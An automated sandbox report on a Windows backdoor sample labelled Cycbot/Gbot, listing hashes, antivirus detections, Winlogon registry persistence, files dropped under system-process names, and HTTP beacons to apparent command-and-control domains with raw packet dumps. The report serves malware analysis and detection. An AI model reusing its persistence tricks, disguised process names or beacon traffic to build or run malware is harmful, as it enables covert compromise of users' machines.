Analysis Date2015-01-24 05:39:24
MD5186cbfaaa6e61ecd83bb7abf7a7cf6d0
SHA1dd7f368968d4f55c1635418898d9747163d349f6

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: aa9807122b7d733ad1c8da2f124d22d9 sha1: 1e45e09a19f517a51509b53f4f11f8ff9ea4b97c size: 117248
Section.rdata md5: 755310d995a072bda48f3ed5cc727dd8 sha1: f3e4d3466d7038a53e3ac9a7f9e1e38fd0d472d8 size: 1024
Section.data md5: 3cb1a6d3d819048dd31e26dbcea87e0c sha1: 92979ac0d578e01b563d762360a56e525289bf5e size: 16896
Section.rsrc md5: 7d6e385d7ee2d9b207a8e804f3dd0a73 sha1: f2d9d338ea273e6ffc19307e2fc10e2e8c83677e size: 1024
Timestamp2005-09-17 11:56:35
VersionPrivateBuild: 1108
PEhash37aada94377366a111c11853d2dace98dd2926d0
IMPhashdd726c5fa4e6a395cdb03557463685da
AV360 Safeno_virus
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Trojan.Heur.KS.1
AVAuthentiumW32/Goolbot.C.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/FakeSpypro.B!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Diple-19
AVDr. WebWin32.HLLW.SpyBot.343
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.IVA
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.C.gen!Eldorado
AVF-SecureTrojan-Downloader:W32/Renos.GTC
AVGrisoft (avg)Agent.5.BJ
AVIkarusPacked.Win32.Krap
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.bs
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.e
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosTroj/FakeAV-CDG
AVSymantecBackdoor.Cycbot!gen2
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNSdolbyaudiodevice.com
Winsock DNSzoneck.com
Winsock DNSwww.google.com
Winsock DNSmotherboardstest.com
Winsock DNS127.0.0.1
Winsock DNSzonejm.com
Winsock DNSpcdocpro.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNSpcdocpro.com
Type: A
209.59.161.20
DNSzonejm.com
Type: A
23.239.15.54
DNSwww.google.com
Type: A
74.125.196.105
DNSwww.google.com
Type: A
74.125.196.106
DNSwww.google.com
Type: A
74.125.196.147
DNSwww.google.com
Type: A
74.125.196.99
DNSwww.google.com
Type: A
74.125.196.103
DNSwww.google.com
Type: A
74.125.196.104
DNSmotherboardstest.com
Type: A
204.11.56.45
DNSmotherboardstest.com
Type: A
204.11.56.45
DNSzoneck.com
Type: A
208.79.234.132
DNSxibudific.cn
Type: A
DNSdolbyaudiodevice.com
Type: A
HTTP GEThttp://zonejm.com/images/im133.jpg?tq=gJ4WK%2FSUh7zEhRMw9YLRsrCSUz2kw8a3nNQLabnVsMLElls0rNa1x7KTVjnaoLe2wecnKK7Ql6TH51MortCC5IaGUUmp19LyyZJqtUn5CGFIRQ%3D%3D
User-Agent: gbot/2.3
HTTP GEThttp://pcdocpro.com/images/logo-2.jpg?tq=gP4aKyd3DU410DemyURgPalzsHV%2B2fkIxsFM105T2o3IIeQJhBT6hHueRkXoo%2BqOUgUg3yvYvpuya789ZWgzVRkGAj27eSO7DvRoeB2t2%2FnZ0Cqti5AzyfNSCq6geFY3HBGLyIU6USoldbh%2FCU7jAYzrejr%2By%2BPpm%2B5y8uSoQK7%2FeurbDNZrImc4c0Q%2Bhm96qOzEEd4fzPmP9jOqtOhyRwRiFHzHzjoRba8qQ8OGDJx8EiTUG%2BchjeZRgDaCxeYXAIcMqzbGKhmv7TCAYFSfGY%2Bs1QOWi%2FX0hBaRZqpHQ9LPpfiXqLLVDGGcMWXsPvsPGu%2FhmJ%2BwcGqFWs9AF3PrhQ6Iu88s%2BUeQ41TmX4jp2lJ4KjZkwzlIpfiZisH95X2h%2BAeF2ggbmAwROt%2FrznXUhZG2xO%2BIIh8ng1opLn8u0Bp3pw38W5r4TntIiIq0xZ4Nn%2B44d2BJpP7UjWI%2FiSqcHyh29DTq%2Bmx4aCYa021VNRtNFG8deacnEgopKnBS3yxTBoO4YNh5mxIMV
User-Agent: gbot/2.3
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://motherboardstest.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz2kw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GEThttp://motherboardstest.com/images/im134.jpg?tq=gK4QK%2FSUh7zEtRMw9YLRsrCiUz2kw8a3nOQLabnVsMLEpls0rNa1x7KjVjnaoLe2wdcnKK7Qh%2FWR40c%2B2NfS8smiWoNJ%2BQhhSEU%3D
User-Agent: gbot/2.3
HTTP GEThttp://zoneck.com/images/im135.jpg?tq=gL4SK%2FSUh7zEpRMw9JGd5dGwJk6s0824xLMjS9rWwLWyxSE6qaKxpMa1C2m51bCwxbNaK%2B%2FbxUqRSfkIYUhF
User-Agent: gbot/2.3
HTTP GEThttp://zonejm.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUq3OjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
HTTP GEThttp://zoneck.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvUq3OjbwvgS917X65rJqlLfgPiWW1cg
User-Agent: gbot/2.3
Flows TCP192.168.1.1:1032 ➝ 23.239.15.54:80
Flows TCP192.168.1.1:1033 ➝ 209.59.161.20:80
Flows TCP192.168.1.1:1034 ➝ 74.125.196.105:80
Flows TCP192.168.1.1:1035 ➝ 74.125.196.105:80
Flows TCP192.168.1.1:1036 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1037 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1038 ➝ 208.79.234.132:80
Flows TCP192.168.1.1:1039 ➝ 23.239.15.54:80
Flows TCP192.168.1.1:1040 ➝ 208.79.234.132:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 6c6f676f   GET /images/logo
0x00000010 (00016)   2d322e6a 70673f74 713d6750 34614b79   -2.jpg?tq=gP4aKy
0x00000020 (00032)   64334455 34313044 656d7955 52675061   d3DU410DemyURgPa
0x00000030 (00048)   6c7a7348 56253242 32666b49 7873464d   lzsHV%2B2fkIxsFM
0x00000040 (00064)   31303554 326f3349 4965514a 68425436   105T2o3IIeQJhBT6
0x00000050 (00080)   68487565 526b586f 6f253242 714f5567   hHueRkXoo%2BqOUg
0x00000060 (00096)   55673379 76597670 75796137 38395a57   Ug3yvYvpuya789ZW
0x00000070 (00112)   677a5652 6b47416a 32376553 4f374476   gzVRkGAj27eSO7Dv
0x00000080 (00128)   526f6542 32743225 32466e5a 30437174   RoeB2t2%2FnZ0Cqt
0x00000090 (00144)   6935417a 79664e53 43713667 65465933   i5AzyfNSCq6geFY3
0x000000a0 (00160)   4842474c 79495536 55536f6c 64626825   HBGLyIU6USoldbh%
0x000000b0 (00176)   32464355 376a4159 7a72656a 72253242   2FCU7jAYzrejr%2B
0x000000c0 (00192)   79253242 50706d25 32423579 3875536f   y%2BPpm%2B5y8uSo
0x000000d0 (00208)   514b3725 32466575 7262444e 5a72496d   QK7%2FeurbDNZrIm
0x000000e0 (00224)   63346330 51253242 686d3936 714f7a45   c4c0Q%2Bhm96qOzE
0x000000f0 (00240)   45643466 7a506d50 396a4f71 744f6879   Ed4fzPmP9jOqtOhy
0x00000100 (00256)   52775269 46487a48 7a6a6f52 62613871   RwRiFHzHzjoRba8q
0x00000110 (00272)   51384f47 444a7838 45695455 47253242   Q8OGDJx8EiTUG%2B
0x00000120 (00288)   63686a65 5a526744 61437865 59584149   chjeZRgDaCxeYXAI
0x00000130 (00304)   634d717a 62474b68 6d763754 43415946   cMqzbGKhmv7TCAYF
0x00000140 (00320)   53664759 25324273 31514f57 69253246   SfGY%2Bs1QOWi%2F
0x00000150 (00336)   58306842 61525a71 70485139 4c507066   X0hBaRZqpHQ9LPpf
0x00000160 (00352)   6958714c 4c564447 47634d57 58735076   iXqLLVDGGcMWXsPv
0x00000170 (00368)   73504775 25324668 6d4a2532 42776347   sPGu%2FhmJ%2BwcG
0x00000180 (00384)   71465773 39414633 50726851 36497538   qFWs9AF3PrhQ6Iu8
0x00000190 (00400)   38732532 42556551 3431546d 58346a70   8s%2BUeQ41TmX4jp
0x000001a0 (00416)   326c4a34 4b6a5a6b 777a6c49 7066695a   2lJ4KjZkwzlIpfiZ
0x000001b0 (00432)   69734839 35583268 25324241 65463267   isH95X2h%2BAeF2g
0x000001c0 (00448)   67626d41 77524f74 25324672 7a6e5855   gbmAwROt%2FrznXU
0x000001d0 (00464)   685a4732 784f2532 42494968 386e6731   hZG2xO%2BIIh8ng1
0x000001e0 (00480)   6f704c6e 38753042 70337077 33385735   opLn8u0Bp3pw38W5
0x000001f0 (00496)   7234546e 74496949 7130785a 344e6e25   r4TntIiIq0xZ4Nn%
0x00000200 (00512)   32423434 6432424a 70503755 6a574925   2B44d2BJpP7UjWI%
0x00000210 (00528)   32466953 71634879 68323944 54712532   2FiSqcHyh29DTq%2
0x00000220 (00544)   426d7834 61435961 30323156 4e52744e   Bmx4aCYa021VNRtN
0x00000230 (00560)   46473864 6561636e 45676f70 4b6e4253   FG8deacnEgopKnBS
0x00000240 (00576)   33797854 426f4f34 594e6835 6d78494d   3yxTBoO4YNh5mxIM
0x00000250 (00592)   56204854 54502f31 2e300d0a 436f6e6e   V HTTP/1.0..Conn
0x00000260 (00608)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000270 (00624)   6f73743a 20706364 6f637072 6f2e636f   ost: pcdocpro.co
0x00000280 (00640)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000290 (00656)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000002a0 (00672)   2f322e33 0d0a0d0a                     /2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674a34 574b2532   3.jpg?tq=gJ4WK%2
0x00000020 (00032)   46535568 377a4568 524d7739 594c5273   FSUh7zEhRMw9YLRs
0x00000030 (00048)   72435355 7a326b77 3861336e 4e514c61   rCSUz2kw8a3nNQLa
0x00000040 (00064)   626e5673 4d4c456c 6c733072 4e613178   bnVsMLElls0rNa1x
0x00000050 (00080)   374b5456 6a6e616f 4c653277 65636e4b   7KTVjnaoLe2wecnK
0x00000060 (00096)   4b37516c 36544835 314d6f72 74434335   K7Ql6TH51MortCC5
0x00000070 (00112)   49614755 556d7031 394c7979 5a4a7174   IaGUUmp19LyyZJqt
0x00000080 (00128)   556e3543 47464952 51253344 25334420   Un5CGFIRQ%3D%3D 
0x00000090 (00144)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000000a0 (00160)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000000b0 (00176)   743a207a 6f6e656a 6d2e636f 6d0d0a41   t: zonejm.com..A
0x000000c0 (00192)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000d0 (00208)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 6c733072 4e613178    */*....ls0rNa1x
0x00000050 (00080)   374b5456 6a6e616f 4c653277 65636e4b   7KTVjnaoLe2wecnK
0x00000060 (00096)   4b37516c 36544835 314d6f72 74434335   K7Ql6TH51MortCC5
0x00000070 (00112)   49614755 556d7031 394c7979 5a4a7174   IaGUUmp19LyyZJqt
0x00000080 (00128)   556e3543 47464952 51253344 25334420   Un5CGFIRQ%3D%3D 
0x00000090 (00144)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000000a0 (00160)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000000b0 (00176)   743a207a 6f6e656a 6d2e636f 6d0d0a41   t: zonejm.com..A
0x000000c0 (00192)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000d0 (00208)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 6c733072 4e613178    */*....ls0rNa1x
0x00000050 (00080)   374b5456 6a6e616f 4c653277 65636e4b   7KTVjnaoLe2wecnK
0x00000060 (00096)   4b37516c 36544835 314d6f72 74434335   K7Ql6TH51MortCC5
0x00000070 (00112)   49614755 556d7031 394c7979 5a4a7174   IaGUUmp19LyyZJqt
0x00000080 (00128)   556e3543 47464952 51253344 25334420   Un5CGFIRQ%3D%3D 
0x00000090 (00144)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x000000a0 (00160)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x000000b0 (00176)   743a207a 6f6e656a 6d2e636f 6d0d0a41   t: zonejm.com..A
0x000000c0 (00192)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000d0 (00208)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000e0 (00224)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 7a326b77 3861336e 4f514c61   rCiUz2kw8a3nOQLa
0x00000040 (00064)   626e5673 4d4c4570 6c733072 4e613178   bnVsMLEpls0rNa1x
0x00000050 (00080)   374b6a56 6a6e616f 4c653277 64636e4b   7KjVjnaoLe2wdcnK
0x00000060 (00096)   4b375168 25324657 52343063 25324232   K7Qh%2FWR40c%2B2
0x00000070 (00112)   4e665338 736d6957 6f4e4a25 32425168   NfS8smiWoNJ%2BQh
0x00000080 (00128)   68534555 25334420 48545450 2f312e30   hSEU%3D HTTP/1.0
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a486f73 743a206d 6f746865   ose..Host: mothe
0x000000b0 (00176)   72626f61 72647374 6573742e 636f6d0d   rboardstest.com.
0x000000c0 (00192)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000d0 (00208)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a                         .3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   342e6a70 673f7471 3d674b34 514b2532   4.jpg?tq=gK4QK%2
0x00000020 (00032)   46535568 377a4574 524d7739 594c5273   FSUh7zEtRMw9YLRs
0x00000030 (00048)   72436955 7a326b77 3861336e 4f514c61   rCiUz2kw8a3nOQLa
0x00000040 (00064)   626e5673 4d4c4570 6c733072 4e613178   bnVsMLEpls0rNa1x
0x00000050 (00080)   374b6a56 6a6e616f 4c653277 64636e4b   7KjVjnaoLe2wdcnK
0x00000060 (00096)   4b375168 25324657 52343063 25324232   K7Qh%2FWR40c%2B2
0x00000070 (00112)   4e665338 736d6957 6f4e4a25 32425168   NfS8smiWoNJ%2BQh
0x00000080 (00128)   68534555 25334420 48545450 2f312e30   hSEU%3D HTTP/1.0
0x00000090 (00144)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000a0 (00160)   6f73650d 0a486f73 743a206d 6f746865   ose..Host: mothe
0x000000b0 (00176)   72626f61 72647374 6573742e 636f6d0d   rboardstest.com.
0x000000c0 (00192)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000d0 (00208)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000e0 (00224)   2e330d0a 0d0a3e54 68697320 69732074   .3....>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a 6d763754 43415946   </html>.mv7TCAYF
0x00000140 (00320)   53664759 25324273 31514f57 69253246   SfGY%2Bs1QOWi%2F
0x00000150 (00336)   58306842 61525a71 70485139 4c507066   X0hBaRZqpHQ9LPpf
0x00000160 (00352)   6958714c 4c564447 47634d57 58735076   iXqLLVDGGcMWXsPv
0x00000170 (00368)   73504775 25324668 6d4a2532 42776347   sPGu%2FhmJ%2BwcG
0x00000180 (00384)   71465773 39414633 50726851 36497538   qFWs9AF3PrhQ6Iu8
0x00000190 (00400)   38732532 42556551 3431546d 58346a70   8s%2BUeQ41TmX4jp
0x000001a0 (00416)   326c4a34 4b6a5a6b 777a6c49 7066695a   2lJ4KjZkwzlIpfiZ
0x000001b0 (00432)   69734839 35583268 25324241 65463267   isH95X2h%2BAeF2g
0x000001c0 (00448)   67626d41 77524f74 25324672 7a6e5855   gbmAwROt%2FrznXU
0x000001d0 (00464)   685a4732 784f2532 42494968 386e6731   hZG2xO%2BIIh8ng1
0x000001e0 (00480)   6f704c6e 38753042 70337077 33385735   opLn8u0Bp3pw38W5
0x000001f0 (00496)   7234546e 74496949 7130785a 344e6e25   r4TntIiIq0xZ4Nn%
0x00000200 (00512)   32423434 6432424a 70503755 6a574925   2B44d2BJpP7UjWI%
0x00000210 (00528)   32466953 71634879 68323944 54712532   2FiSqcHyh29DTq%2
0x00000220 (00544)   426d7834 61435961 30323156 4e52744e   Bmx4aCYa021VNRtN
0x00000230 (00560)   46473864 6561636e 45676f70 4b6e4253   FG8deacnEgopKnBS
0x00000240 (00576)   33797854 426f4f34 594e6835 6d78494d   3yxTBoO4YNh5mxIM
0x00000250 (00592)   56204854 54502f31 2e300d0a 436f6e6e   V HTTP/1.0..Conn
0x00000260 (00608)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000270 (00624)   6f73743a 20706364 6f637072 6f2e636f   ost: pcdocpro.co
0x00000280 (00640)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x00000290 (00656)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000002a0 (00672)   2f322e33 0d0a0d0a                     /2.3....

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   352e6a70 673f7471 3d674c34 534b2532   5.jpg?tq=gL4SK%2
0x00000020 (00032)   46535568 377a4570 524d7739 4a476435   FSUh7zEpRMw9JGd5
0x00000030 (00048)   6447774a 6b367330 38323478 4c4d6a53   dGwJk6s0824xLMjS
0x00000040 (00064)   39725777 4c577978 53453671 614b7870   9rWwLWyxSE6qaKxp
0x00000050 (00080)   4d613143 326d3531 62437778 624e614b   Ma1C2m51bCwxbNaK
0x00000060 (00096)   25324225 32466278 55715253 666b4959   %2B%2FbxUqRSfkIY
0x00000070 (00112)   55684620 48545450 2f312e30 0d0a436f   UhF HTTP/1.0..Co
0x00000080 (00128)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000090 (00144)   0a486f73 743a207a 6f6e6563 6b2e636f   .Host: zoneck.co
0x000000a0 (00160)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x000000b0 (00176)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000c0 (00192)   2f322e33 0d0a0d0a d82e0f77 927f       /2.3.......w..

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427655 71334f6a 62777667 53393137   fBvUq3OjbwvgS917
0x00000040 (00064)   56363572 4a716c4c 66675069 57573163   V65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 656a6d2e 636f6d0d   ost: zonejm.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000a0 (00160)   2e330d0a 0d0a6570 743a202a 2f2a0d0a   .3....ept: */*..
0x000000b0 (00176)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000c0 (00192)   2f322e33 0d0a0d0a d82e0f77 927f       /2.3.......w..

0x00000000 (00000)   47455420 2f696d61 6765732f 696d3133   GET /images/im13
0x00000010 (00016)   332e6a70 673f7471 3d674b5a 45747a79   3.jpg?tq=gKZEtzy
0x00000020 (00032)   4d763572 4a717847 314a3432 707a4d66   Mv5rJqxG1J42pzMf
0x00000030 (00048)   66427655 71334f6a 62777667 53393137   fBvUq3OjbwvgS917
0x00000040 (00064)   58363572 4a716c4c 66675069 57573163   X65rJqlLfgPiWW1c
0x00000050 (00080)   67204854 54502f31 2e300d0a 436f6e6e   g HTTP/1.0..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 207a6f6e 65636b2e 636f6d0d   ost: zoneck.com.
0x00000080 (00128)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x00000090 (00144)   65722d41 67656e74 3a206762 6f742f32   er-Agent: gbot/2
0x000000a0 (00160)   2e330d0a 0d0a6570 743a202a 2f2a0d0a   .3....ept: */*..
0x000000b0 (00176)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000c0 (00192)   2f322e33 0d0a0d0a d82e0f77 927f       /2.3.......w..


Strings
!=

040904b0
1108
B&reak
C&ompile
&Data
MS Sans Serif
PrivateBuild
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
0ZX\NC-
14Z.*('
2FMp)w
>2+oKs
4jdXovUR
4pN=Hk
.#5k?f
5%X<%X
6FXeXM
	6*kl	
]}7v$X=
{8i+61
8I*N%Xwx
>	8lH{
8X&X,zS
9DXdX@
9nGXzoW
 ad,s;J
a< z<<
B;N.\Z8
c8zSI.
cH2NDX
>cI8cN
CloseHandle
CreateEventA
CreateSemaphoreA
CreateStdAccessibleObject
CreateThread
%*cu4t
@.data
dc'2}FX
DeleteCriticalSection
dXDXo<
dX^eXw
dXfX&X"
dXGX	x
DXGXXp
DX*jJ:[A
	DXltC
=)dX%X
DX$Xl:
dYgX\!
}~EE>FS
E|K?`U
EnterCriticalSection
EnumResourceNamesA
eXfXwk
eXfX$Xb
EXGXyQ
eXHn<`
EX(=ih
ExitProcess
eXIz<z
eXo%X*FX
}<EXt<
\eX&X,
EXY%Xv
FindClose
FindFirstFileW
FreeEnvironmentStringsA
fX9$Xz
[fXDX|
fXDXGX
fX_dXij
FXGXhA
fXgXo%X
FX:i9dXO/)
GetDriveTypeW
GetLastError
GetLocalTime
GetStartupInfoA
GetSystemTimeAsFileTime
GetThreadPriority
|?gX6$X
GX6x|<
GXeX6J>~]L
GXfXm\3
gXgX]{
GX~GXr
)GXn.:
gX;&X6}
GXx8GX
gX&XY)
[gXYy`
H:EX	b
h[EXGXh/
HFX&X#
hhLoad
hLibrh
hLocah
H'XZ$X
{IdX=u
IgXt'X&Xn
InitializeCriticalSection
Inx`o/p
:I;+V^
J*8w/m
JndX(V!
jRqk2m
	>j:,uA
juVI\nt
(k7"ky
Kel +LChFO
KERNEL32.dll
K//eXS
kFX~eX5
kgX$Xk
kW	kt!
{;l5dX
ldX(t@
LeaveCriticalSection
.LeXmI
L:fXZ)0
LGXGXu
lL.dX#
LoadLibraryA
LresultFromObject
l&XJ5K
Ml?dX_
[M	o.J
M"	u}tR
]]n6%X
nel810sN
ngXOygX
Nk$XmN
NN6fXp
nrLET.`[
o.8dXh
oIZ	t'X
OLEACC.dll
Oow/dX~
PRT"yb
Qj:y#Ctk
%{r#6&
`.rdata
ReadFile
ReleaseSemaphore
rkEj:)
SBAWs,
SetEndOfFile
SetEvent
SetFilePointer
.tA:7je
]tfX\[(
!This program cannot be run in DOS mode.
TPhhU@
/uwfXi
UWMgXFX
uYHSzC
v4ui^T
v:EXgXs
;VeXX 
[vkFRaP
Vn^zQ+
v>wDXa
v[WGX}
VY5$Xb
)W0Wm]
w8YIQ.
WaitForMultipleObjects
WaitForSingleObject
WDXGX 
WEX&X1
wmYix>
WriteFile
WV;c'X
Ww	fX>
w)WWE6&
W,=Y^y
W;z.v[
,(=~=&X
X4y<nC
'X{|5x
X5%XY\
X}6FX^
X7,Z(EXLx
}{X]9/
X-9O%X
$XdXImP
X.dXo?
XEX}6{z
'XeXDX
XeXi;\
XeXkkOo
XEX_:(O
.$XeXR
XeXWDXq
%XfX)4
XFX^75
X^FXDX	(
X	FXDX;vi|
X|fXFX
XfXGX-
XfXNEX
X_fX;P
XFX'X,9
X/gX9~r
X_GXDX
XGXdXa
XGXFX,
X\GXfXeX 
&X+gX%X)I
XHO*gX
Xh:Uw|-{
XHy$X&X
XIumX.
X,JFXn
X	JI$X
%XJukeX/
Xju'Xu
Xk_jGX
%Xl\-4
X\|~,L4
X.;lt^
xMUZNy
XM$X9B
Xn5}dX
Xn(+$Xh
XOuy=	
~	'XO'Xq
Xo'Xws
Xo%XX2
xpan?t.
X^[t=J
X(tKgXwGX
XTV4l!
$XTV7}y
xU{.j-
&XUJDX1
}&Xu	KL
%XUTdX
XVeXi{Z
X+w$X2
%Xw'Xq
XwY,}i
X[W,ZM
$X]&X#
X]%X;:
X\{&X<
Xx4gX`
X-'X7o
X|%XEX
X]%XFX
X&XGXdX
'X.%XO
	$X'XO
X%XO)T
X^.$Xs
X>}$XtX
X%XVDX
X$X$X^a
X%X&XeX
